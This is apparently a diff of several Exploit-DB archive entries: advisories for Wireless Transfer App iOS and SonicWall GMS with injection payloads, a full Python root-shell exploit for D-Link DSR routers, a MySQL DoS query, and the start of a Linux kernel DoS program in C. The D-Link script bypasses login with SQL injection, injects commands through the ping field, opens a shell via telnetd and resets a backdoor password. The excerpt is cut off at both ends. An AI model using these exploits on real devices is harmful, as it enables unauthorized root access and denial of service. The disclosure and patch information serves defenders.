<div class="button"><a href="upload.html"><img src="images/anniuda2.png" alt=" "></a></div>
<div class="photoGallery_head">
<div class="phga_hd_left">Album : ">%20<x src=\..\<../[COMMAND/PATH INJECT VULNERABILITY IN ALBUM NAME BY photoGallery_head CLASS!]></div>
<div class="phga_hd_right">
<input value="Zur?ck zur Sammlung" class="back" type="button">
</div>
</div>
</div>
PoC: Album Name - photoalbum in the Album Index List
<div class="photo_list">
<dl><dt class="photoalbum" alt="D579B80C-B73D-4A16-9379-FB29A6CFC12C"><a href="albumhtm?id=D579B80C-B73D-4A16-9379-FB29A6CFC12C">
<img src="/albumimg_D579B80C-B73D-4A16-9379-FB29A6CFC12C.jpg" height="100" width="100"></a></dt>
<dd>>%20<x src=\..\<../[COMMAND/PATH INJECT VULNERABILITY IN ALBUM NAME BY photoalbum!]>(125)</dd></dl>
<dl><dt class="photoalbum" alt="632F9F75-1B7A-41E4-8070-E62B1ECC780A"><a href="albumhtm?id=632F9F75-1B7A-41E4-8070-E62B1ECC780A">
<img src="/albumimg_632F9F75-1B7A-41E4-8070-E62B1ECC780A.jpg" height="100" width="100"></a></dt><dd>Fotoarchiv(0)</dd></dl>
<dl><dt class="photoalbum" alt="C44B3062-3A67-4BFA-AF16-04CC8DE2CD29"><a href="albumhtm?id=C44B3062-3A67-4BFA-AF16-04CC8DE2CD29">
<img src="/albumimg_C44B3062-3A67-4BFA-AF16-04CC8DE2CD29.jpg" height="100" width="100"></a></dt><dd>WallpapersHD(3)</dd></dl>
Reference(s):
http://localhost:6688/index.html
http://localhost:6688/albumhtm
http://localhost:6688/albumhtm?id=
http://localhost:6688/albumhtm?id=D579B80C-B73D-4A16-9379-FB29A6CFC12C
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure encode and parse of the vulnerable album name value.
Parse and filter also the index and sub category output list to ensure it prevents local command/path requests.
Security Risk:
==============
The security risk of the local command/path inject web vulnerability is estimated as high.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2013 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

View file

@ -0,0 +1,191 @@
Document Title:
===============
Wireless Transfer App 3.7 iOS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1152
Release Date:
=============
2013-12-04
Vulnerability Laboratory ID (VL-ID):
====================================
1152
Common Vulnerability Scoring System:
====================================
6.7
Product & Service Introduction:
===============================
Wireless Transfer App is an easy to use photo and video transfer tool. It helps you easily and quickly transfer photos and videos
between iPhone and iPad, as well as transfer photos and videos from computer to iPad/iPhone/iPod and vice verse. With Wireless
Transfer App, you can transfer photos and videos from iPad to iPad, from iPad to iPhone, from iPhone to iPad, from iPhone to iPhone,
from computer to iPad, from iPhone to computer and more. There is no need for USB cable or extra software. You just need to put your
devices under the same Wi-Fi network.
(Copy of the Homepage: https://itunes.apple.com/en/app/wireless-transfer-app-share/id543119010 & http://www.wirelesstransferapp.com/ )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple command/path inject vulnerabilities in the Wireless Transfer App v3.7 for apple iOS.
Vulnerability Disclosure Timeline:
==================================
2012-11-30: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Wireless Transfer App COM
Product: Wireless Transfer App 3.7
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A local command/path injection web vulnerability has been discovered in the Wireless Transfer App v3.7 for apple iOS.
The vulnerability allows to inject local commands via vulnerable system values to compromise the apple mobile iOS application.
The vulnerability is located in the in the album name value of the wireless transfer app index and sub category list module.
Remote attackers are able to manipulate iOS device - `photo app` (default) album names. The execute of the injected
command/path request occurs in the album sub category list and the main album name index list. The security risk of the
command/path inject vulnerabilities are estimated as high(-) with a cvss (common vulnerability scoring system) count of 6.7(-).
Exploitation of the command/path inject vulnerability requires a local low privileged iOS device account with restricted access
and no direct user interaction. Successful exploitation of the vulnerability results unauthorized execution of system specific
commands or unauthorized path requests.
Vulnerable Application(s):
[+] Wireless Transfer App v3.7
Vulnerable Parameter(s):
[+] album name
[+] photoGallery_head - album
Affected Module(s):
[+] Index - Album Name List
[+] Sub Category - Title Album Name List
Proof of Concept (PoC):
=======================
The local command inject web vulnerabilities can be exploited by local low privileged device user accounts with low
user interaction. For security demonstration or to reproduce the vulnerability follow the information and steps below.
Manual steps to exploit the vulnerability ...
1. Install the wireless transfer v3.7 iOS mobile application
2. Open the default Photo app of your iOS device
3. Include an album with the following payload `">%20<x src=\..\<../var/mobile/Library/[x application path]>` and save it
4. Switch back to the installed wireless transfer app and start the wifi transfer
5. Open the local web-server url http://localhost:6688/ (default link)
6. The local path/command execute occurs in the album name value of the photoGallery_head class
7. Successful reproduce of the vulnerability!
PoC: Album Name - photoGallery_head in the Album Sub Category List
<div class="header">
<div class="logo"> <a href="index.html"><img src="images/logo.png" alt="logo"></a> </div>
<div class="title"><a href="index.html"><img src="images/title4.png" alt="logo"></a></div>
<div class="button"><a href="upload.html"><img src="images/anniuda2.png" alt=" "></a></div>
<div class="photoGallery_head">
<div class="phga_hd_left">Album : ">%20<x src=\..\<../[COMMAND/PATH INJECT VULNERABILITY IN ALBUM NAME BY photoGallery_head CLASS!]></div>
<div class="phga_hd_right">
<input value="Zur?ck zur Sammlung" class="back" type="button">
</div>
</div>
</div>
PoC: Album Name - photoalbum in the Album Index List
<div class="photo_list">
<dl><dt class="photoalbum" alt="D579B80C-B73D-4A16-9379-FB29A6CFC12C"><a href="albumhtm?id=D579B80C-B73D-4A16-9379-FB29A6CFC12C">
<img src="/albumimg_D579B80C-B73D-4A16-9379-FB29A6CFC12C.jpg" height="100" width="100"></a></dt>
<dd>>%20<x src=\..\<../[COMMAND/PATH INJECT VULNERABILITY IN ALBUM NAME BY photoalbum!]>(125)</dd></dl>
<dl><dt class="photoalbum" alt="632F9F75-1B7A-41E4-8070-E62B1ECC780A"><a href="albumhtm?id=632F9F75-1B7A-41E4-8070-E62B1ECC780A">
<img src="/albumimg_632F9F75-1B7A-41E4-8070-E62B1ECC780A.jpg" height="100" width="100"></a></dt><dd>Fotoarchiv(0)</dd></dl>
<dl><dt class="photoalbum" alt="C44B3062-3A67-4BFA-AF16-04CC8DE2CD29"><a href="albumhtm?id=C44B3062-3A67-4BFA-AF16-04CC8DE2CD29">
<img src="/albumimg_C44B3062-3A67-4BFA-AF16-04CC8DE2CD29.jpg" height="100" width="100"></a></dt><dd>WallpapersHD(3)</dd></dl>
Reference(s):
http://localhost:6688/index.html
http://localhost:6688/albumhtm
http://localhost:6688/albumhtm?id=
http://localhost:6688/albumhtm?id=D579B80C-B73D-4A16-9379-FB29A6CFC12C
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure encode and parse of the vulnerable album name value.
Parse and filter also the index and sub category output list to ensure it prevents local command/path requests.
Security Risk:
==============
The security risk of the local command/path inject web vulnerability is estimated as high.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2013 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

View file

@ -0,0 +1,303 @@
#!/usr/bin/python
#
# CVEs: CVE-2013-5945 - Authentication Bypass by SQL-Injection
# CVE-2013-5946 - Privilege Escalation by Arbitrary Command Execution
#
# Vulnerable Routers: D-Link DSR-150 (Firmware < v1.08B44)
# D-Link DSR-150N (Firmware < v1.05B64)
# D-Link DSR-250 and DSR-250N (Firmware < v1.08B44)
# D-Link DSR-500 and DSR-500N (Firmware < v1.08B77)
# D-Link DSR-1000 and DSR-1000N (Firmware < v1.08B77)
#
# Likely to work on: D-Link DWC-1000
#
# Download URL: http://tsd.dlink.com.tw
#
# Arch: mips and armv6l, Linux
#
# Author: 0_o -- null_null
# nu11.nu11 [at] yahoo.com
# Oh, and it is n-u-one-one.n-u-one-one, no l's...
# Wonder how the guys at packet storm could get this wrong :(
#
# Date: 2013-08-18
#
# Purpose: Get a non-persistent root shell on your D-Link DSR.
#
# Prerequisites: Network access to the router ports 443 and 23.
# !!! NO AUTHENTICATION CREDENTIALS REQUIRED !!!
#
#
# Coordinated Disclosure -- history and timeline:
#
# 2013-09-12: Informed Heise Security and asked for their support on this case
# 2013-09-13: Informed the manufacturer D-Link via
# http://www.dlink.com/us/en/support/security-advisories/report-vulnerabilities/ (contact form is buggy!)
# http://www.d-link.co.za/contactus/feedback/ (contact request submitted)
# http://www.dlink.com/de/de/contact-d-link (contact form is buggy!)
# mail@dlink.ru (contact request sent)
# info@dlink.ee (contact request sent)
# info@dlink.de (contact request sent)
# 2013-09-14: Informed the German Federal Office for Information Security (BSI) via certbund@bsi.bund.de
# 2013-09-16: D-Link Russia and D-Link Germany claim to have forwarded my request.
# 2013-09-17: German BSI responds, contact established.
# 2013-09-24: Requested CVE-IDs.
# 2013-09-25: Heise responds, contact established.
# 2013-09-27: D-Link asks for details on vulns and the exploit code.
# Mitre assigns two CVEs:
# CVE-2013-5945 -- authentication bypass
# CVE-2013-5946 -- privilege escalation
# 2013-09-30: D-Link has received the exploit and documentation via BSI
# 2013-11-29: Patches are available for the DSR router series via tsd.dlink.com.tw
# DSR-150: Firmware v1.08B44
# DSR-150N: Firmware v1.05B64
# DSR-250 and DSR-250N: Firmware v1.08B44
# DSR-500 and DSR-500N: Firmware v1.08B77
# DSR-1000 and DSR-1000N: Firmware v1.08B77
# 2013-12-03: Public Disclosure
#
# And now - the fun part :-)
#
import httplib
import urllib
import telnetlib
import time
import sys
import crypt
import random
import string
##############################
#
# CHANGE THESE VALUES -- BEGIN
#
# Your router's IP:PORT
ipaddr = "192.168.10.1:443"
# Password to be set (by this hack) on the backdoor account
bdpasswd = "password"
#
# CHANGE THESE VALUES -- END
#
# persistent config file: /tmp/teamf1.cfg.ascii
# Edit this file to make your changes persistent.
#
##############################
cookie = ""
pid = -2
bduser = ""
def request(m = "", u = "", b = "", h = ""):
global ipaddr
conn = httplib.HTTPSConnection(ipaddr, timeout = 15)
assert m in ["GET", "POST"]
conn.request(method = m, url = u, body = b, headers = h)
ret = conn.getresponse()
header = ret.getheaders()
data = ret.read()
conn.close()
return (header, data)
def login(user, passwd):
global ipaddr
headers = {'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
'User-Agent': "Exploit",
'Referer': "https://" + ipaddr + "/scgi-bin/platform.cgi",
'Content-Type': "application/x-www-form-urlencoded"}
body = {'thispage' : "index.htm",
'Users.UserName' : user,
'Users.Password' : passwd,
'button.login.Users.deviceStatus' : "Login",
'Login.userAgent' : "Exploit"}
return request("POST", "/scgi-bin/platform.cgi", urllib.urlencode(body), headers)
def logout():
global ipaddr, cookie
headers = {'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
'User-Agent': "Exploit",
'Referer': "https://" + ipaddr + "/scgi-bin/platform.cgi",
'Content-Type': "application/x-www-form-urlencoded"}
body = ""
return request("GET", "/scgi-bin/platform.cgi?page=index.htm", urllib.urlencode(body), headers)
def execCmd(cmd = None):
global ipaddr, cookie
assert cmd != None
headers = {'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
'User-Agent': "Exploit",
'Referer': "https://" + ipaddr + "/scgi-bin/platform.cgi?page=systemCheck.htm",
'Cookie': cookie,
'Content-Type': "application/x-www-form-urlencoded"}
body = {'thispage' : "systemCheck.htm",
'ping.ip' : "localhost;" + cmd,
'button.traceroute.diagDisplay' : "Traceroute"}
return request("POST", "/scgi-bin/platform.cgi", urllib.urlencode(body), headers)
def findPid(mystr = None):
# " 957 root 2700 S /usr/sbin/telnetd -l /bin/login"
assert mystr != None
mypid = 0
(h, d) = execCmd(cmd = "ps|grep telnetd|grep -v grep");
s = d.find(mystr)
if s > 0:
# telnetd is running
cand = d[s - 50 : s]
try:
mypid = int(cand.split("\n")[1].split()[0])
except IndexError:
mypid = int(cand.split(">")[1].split()[0])
return mypid
def restartTelnetd(mystr1 = None, mystr2 = None):
assert mystr1 != None and mystr2 != None
global pid
pid = findPid("telnetd -l /bin/")
if pid > 0:
# Stopping the running telnetd
print "[+] Stopping telnetd (" + str(pid) + "): ",
sys.stdout.flush()
(h, d) = execCmd("kill " + str(pid))
pid = findPid(mystr1)
if pid > 0:
print "FAILURE"
sys.exit(-1)
else:
print "OK"
# Starting a new telnetd
print "[+] Starting telnetd: ",
sys.stdout.flush()
(h, d) = execCmd("telnetd -l " + mystr2)
pid = findPid("telnetd -l " + mystr2)
if pid > 0:
print "OK (" + str(pid) + ")"
else:
print "FAILURE"
sys.exit(-1)
def main():
global ipaddr, cookie, pid, bduser, bdpasswd
user = "admin"
passwd = "' or 'a'='a"
print "\n\nPrivilege Escalation exploit for D-Link DSR-250N (and maybe other routers)"
print "This change is non-persistent to device reboots."
print "Created and coded by 0_o (nu11.nu11 [at] yahoo.com)\n\n"
# Logging into the router
print "[+] Trying to log into the router: ",
sys.stdout.flush()
(h, d) = login(user, passwd)
if d.find("User already logged in") > 0:
print "FAILURE"
print "[-] The user \"admin\" is still logged in. Please log out from your current session first."
sys.exit(-1)
elif d.find('<a href="?page=index.htm">Logout</a>') > 0:
while h:
(c1, c2) = h.pop()
if c1 == 'set-cookie':
cookie = c2
break
print "OK (" + cookie + ")"
elif d.find("Invalid username or password") > 0:
print "FAILURE"
print "[-] Invalid username or password"
sys.exit(-1)
else:
print "FAILURE"
print "[-] Unable to login."
sys.exit(-1)
# Starting a telnetd with custom parameters
print "[+] Preparing the hack..."
restartTelnetd("/bin/login", "/bin/sh")
# Do the h4cK
print "[+] Hacking the router..."
print "[+] Getting the backdoor user name: ",
sys.stdout.flush()
tn = telnetlib.Telnet(ipaddr.split(":")[0])
tn.read_very_eager()
tn.write("cat /etc/profile\n")
time.sleep(5)
data = tn.read_very_eager()
for i in data.split("\n"):
if i.find('"$USER"') > 0:
bduser = i.split('"')[3]
break
if len(bduser) > 0:
print "OK (" + bduser + ")"
else:
print "FAILURE"
sys.exit(-1)
print "[+] Setting the new password for " + bduser + ": ",
sys.stdout.flush()
tn.write("cat /etc/passwd\n")
time.sleep(5)
data = tn.read_very_eager()
data = data.split("\n")
data.reverse()
data.pop()
data.reverse()
data.pop()
data = "\n".join(data)
for i in data.split("\n"):
if i.find(bduser) >= 0:
line = i.split(':')
s1 = string.lowercase + string.uppercase + string.digits
salt = ''.join(random.sample(s1,2))
pw = crypt.crypt(bdpasswd, salt)
line[1] = pw
# doesn't work for some odd reason -- too lazy to find out why
#salt = ''.join(random.sample(s1,8))
#line[1] = crypt.crypt(bdpasswd, '$1$' + salt + '$')
data = data.replace(i, ":".join(line))
break
tn.write('echo -en "" > /etc/passwd\n')
time.sleep(5)
for i in data.split("\n"):
tn.write('echo -en \'' + i + '\n\' >> /etc/passwd\n')
time.sleep(1)
data = tn.read_very_eager()
tn.close()
if data.find(pw) >= 0:
print "OK (" + pw + ")"
success = True
else:
print "FAILURE"
print "[-] Could not set the new password."
sys.exit(-1)
# Switching back to the originals
print "[+] Mobbing up..."
restartTelnetd("/bin/sh", "/bin/login")
# Logging out
print "[+] Logging out: ",
sys.stdout.flush()
(h, d) = logout()
if d.find('value="Login"') > 0:
print "OK"
else:
print "FAILURE"
print "[-] Unable to determine if user is logged out."
# Print success message
if success:
print "[+] You can now log in via SSH and Telnet by using:"
print " user: " + bduser
print " pass: " + bdpasswd
print " These changes will be reverted upon router reboot."
print " Edit \"/tmp/teamf1.cfg.ascii\" to make your changes persistent."
main()
sys.exit(0)

234
platforms/jsp/webapps/30054.txt Executable file
View file

@ -0,0 +1,234 @@
Document Title:
===============
Sonicwall GMS v7.x - Filter Bypass & Persistent Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1099
Bulletin: Dell SonicWALL GMS Service Bulletin for Cross-Site Scripting Vulnerability
http://www.sonicwall.com/us/shared/download/Support_Bulletin_GMS_Vulnerability_Hotfix_134235.pdf
Release Date:
=============
2013-12-05
Vulnerability Laboratory ID (VL-ID):
====================================
1099
Common Vulnerability Scoring System:
====================================
4.1
Product & Service Introduction:
===============================
Dell SonicWALL`s management and reporting solutions provide a comprehensive architecture for centrally creating and managing
security policies, providing real-time monitoring and alerts, and delivering intuitive compliance and usage reports, all from
a single management interface. Whether your organization is a small- or medium-sized business, a distributed enterprise or a
managed service provider, Dell™ SonicWALL™ offers software and appliance solutions to meet its needs.
The award-winning Dell SonicWALL Global Management System (GMS®) provides organizations, distributed enterprises and service
providers with a flexible, powerful and intuitive solution to centrally manage and rapidly deploy SonicWALL firewall, anti-spam,
backup and recovery, and secure remote access solutions. Flexibly deployed as software, hardware—in the form of the Universal
Management Appliance (UMA)—or a virtual appliance, SonicWALL GMS also provides centralized real-time monitoring and comprehensive
policy and compliance reporting to drive down the cost of owning and managing SonicWALL security appliances. Multiple GMS
software, hardware, and virtual appliance agents, when deployed in a cluster, can scale to manage thousands of SonicWALL
security appliances. This makes GMS an ideal solution for small- to medium-sized businesses, enterprises and managed service
providers that have either single-site or distributed multi-site environments.
(Copy of the Vendor Homepage: http://www.sonicwall.com/emea/en/products/Centralized_Management_Reporting.html )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent validation vulnerability in the DELL SonicWall GMS v7.1.x Appliance Web-Application.
Vulnerability Disclosure Timeline:
==================================
2013-09-26: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2013-09-27: Vendor Notification (DELL SonicWall Security Team)
2013-10-09: Vendor Response/Feedback (DELL SonicWall Security Team)
2013-12-04: Vendor Fix/Patch ( DELL SonicWall Developer Team)
2013-12-05: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
DELL SonicWall
Product: GMS Networks Appliance Application 7.1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official DELL SonicWall GMS v7.1.x Appliance Web-Application.
The bug allows an attacker (remote) to implement/inject own malicious malicious script codes on the application-side (persistent).
The persistent vulnerability is located in the `valfield_1` & `value_1` value parameters of the `Alert Settings` module POST method request.
Remote attackers with low privileged application user account can inject own script codes to the POST method request of the createNewThreshold.jsp
appliance application file. After the inject the attacker is able to update and save the values to continue with the execute the main alert
settings module. The execute of the script code occurs in the ematStaticAlertTypes.jsp file context by the earlier manipulated vulnerable values.
To bypass the filter it is required to split the request by attaching a double frame for the script code execute. The restricted application itself
disallows the POST request of guest by usage of the unrestricted context POST method request attackers are able to bypass the filter & exception-handling.
The security risk of the persistent input validation web vulnerability is estimated as high(-) with a cvss (common vulnerability scoring system)
count of 4.1(+). The coordinated disclosure procedure of the remote vulnerability has been navigated by the product manager Wilson Lee (DELL).
The hotfix and information has been provided in cooperation with the vulnerability-laboratory.
Exploitation of the persistent web vulnerability requires low user interaction and a local low privileged (guest) web application user account.
Successful exploitation of the vulnerability can lead to persistent session hijacking (customers), account steal via persistent web attacks,
persistent phishing or persistent manipulation of vulnerable module context.
Vulnerable Application(s):
[+] DELL - SonicWall GMS v7.1.x Appliance Application
Vulnerable Module(s):
[+] Alert Settings > NewThreshold
Vulnerable File(s):
[+] createNewThreshold.jsp > ematStaticAlertTypes.jsp
Vulnerable Parameter(s):
[+] valfield_1
[+] value_1
Affected Module(s):
[+] createNewThreshold
[+] ematStaticAlertTypes
[+] Alert Settings - Main Listing
Affected Product(s):
[+] Dell SonicWALL GMS
[+] Dell SonicWALL Analyzer
[+] Dell SonicWALL UMA E5000
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with low privileged or restricted guest accounts and
low user interaction. For security demonstration or reproduce the vulnerability follow the information and steps below.
Location: Alert Settings
http://gms.localhost:8080/sgms/panelManager?panelidz=1&level=1&typeOfUnits=0#
Inject via Add: Edit contents for alert type: Backed-Up Syslog Files
http://gms.localhost:8080/sgms/ematStaticAlertTypes.jsp?
Execute: Create New Threshold
http://gms.localhost:8080/sgms/createNewThreshold.jsp?
Affected:
http://gms.localhost:8080/sgms/auth
Manual steps to reproduce ...
1. Open the Sonicwall GMS appliance application and login with full restrictions as guest
2. Switch to the vulnerable Console > Events > Alert Settings section
3. Click Add Alert and a new blank window of the application will be opened
4. Click in the upcomings window in the Alert Types section the Edit Content link
5. Now, a new window opens "Edit contents for alert type: Backup Sys-Log Files
6. On top is a little plus button next to the Threshold value
9. A new window opens with Elements box ... Inject your payload (script code) to the description eval in the operator fields
10. After the inject to the input fields the attacker only needs to click the Add Element button on the buttom of the page
11. The code will be directly executed and is persistent saved as element in the specific section
12. Save the input via update and go back to the alert settings main section were the code execute occurs in the same connected value
13. Successful reproduced!
PoC: Alert Settings - Create New Threshold
Critical</option></select> </td><td class="tblData2" width="1">
<img src="Create%20New%20Threshold_files/1x1trans.gif"></td><td class="tblData2" align="center"
nowrap="nowrap"><input class="controlFont" name="disabled" value="1" type="checkbox"></td>
<td class="tblData2" width="1"><img src="Create%20New%20Threshold_files/1x1trans.gif"></td>
<td class="tblData2" align="center" nowrap="nowrap"><a href="#" onclick="deleteElement(1);">
<img src="Create%20New%20Threshold_files/trash.gif" alt="Delete this destination" border="0"></a></td>
<td class="tblData2" width="1"><img src="Create%20New%20Threshold_files/1x1trans.gif"></td></tr><tr><td></td>
<td class="tblData2" width="1"><img src="Create%20New%20Threshold_files/1x1trans.gif"></td><td colspan="5"
class="tblData2" align="left" nowrap="nowrap"> <font class="controlfont">Description: </font>
<input class="controlfont" size="64" name="description"
value="is equal to >" <[PERSISTENT INJECTED SCRIPT CODE!]" type="text"> >"<[PERSISTENT INJECTED SCRIPT CODE!]">"
onkeyup="enableAutoDesc(1,0);"></td><td class="tblData2"
width=1><img src="images/1x1trans.gif"></td>
Note: Please, feel free to read also the patch information provided in the solution section of the advisory document.
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse, prevention filter mechanism or clean encode of the vulnerable value_1 and valfield_1 parameters.
Also restrict and escape the affected input field and output listing in the connected modules.
Resolution (DELL SonicWall):
We recommend existing users of Dell SonicWALL GMS/Analyzer/UMA 7.1 to apply SP1 (if they have not already done so), and then apply Hotfix 134235 to prevent cross-site scripting by unauthorized users. 7.1 SP1 and the Hotfix are available for download from www.mysonicwall.com. Users should log into mySonicWALL and click on Downloads > Download Center in the navigation panel on the left, then select “GMS/Analyzer” in the Software Type drop down menu.
Security Risk:
==============
The security risk of the persistent input validation web vulnerability with filter bypass is estimated as medium(+).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2013 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

11
platforms/linux/dos/30020.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/23911/info
MySQL is prone to a remote denial-of-service vulnerability because it fails to handle certain specially crafted queries.
An attacker can exploit this issue to crash the application, denying access to legitimate users.
NOTE: An attacker must be able to execute arbitrary SELECT statements against the database to exploit this issue. This may be through legitimate means or by exploiting other latent SQL-injection vulnerabilities.
Versions prior to MySQL 5.0.40 are vulnerable.
SELECT id from example WHERE id IN(1, (SELECT IF(1=0,1,2/0)));

9
platforms/linux/dos/30024.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23927/info
The libexif library is prone to an integer-overflow vulnerability because the software fails to properly ensure that integer math operations do not result in overflows.
Successful exploits of this vulnerability allow remote attackers to execute arbitrary machine code in the context of an application using the vulnerable library. Failed attempts will likely result in denial-of-service conditions.
Versions of libexif prior to 0.6.14 are vulnerable to this issue.
http://www.exploit-db.com/sploits/30024.jpg

9
platforms/linux/dos/30044.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24004/info
Sun JDK is prone to a multiple vulnerabilities.
An attacker can exploit these issues to crash the affected application, effectively denying service. The attacker may also be able to execute arbitrary code, which may facilitate a compromise of the underlying system.
Sun JDK 1.5.0_07-b03 is vulnerable to these issues; other versions may also be affected.
http://www.exploit-db.com/sploits/30043.zip

39
platforms/linux/dos/30080.c Executable file
View file

@ -0,0 +1,39 @@
source: http://www.securityfocus.com/bid/24134/info
The Linux Kernel is prone to a denial-of-service vulnerability.
A local attacker can exploit this issue to cause the kernel to crash, effectively denying service to legitimate users.
#include <sys/types.h>
#include <sys/ioctl.h>
#include <dirent.h>
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
struct kernel_dirent {
long d_ino;
long d_off;
unsigned short d_reclen;
char d_name[256]; /* We must not include limits.h! */
};
#define VFAT_IOCTL_READDIR_BOTH _IOR('r', 1, struct kernel_dirent [2])
#define VFAT_IOCTL_READDIR_SHORT _IOR('r', 2, struct kernel_dirent [2])
int main(void)
{
int fd = open(".", O_RDONLY);
struct kernel_dirent de[2];
while (1) {
int i = ioctl(fd, VFAT_IOCTL_READDIR_BOTH, (long)de);
if (i == -1) break;
if (de[0].d_reclen == 0) break;
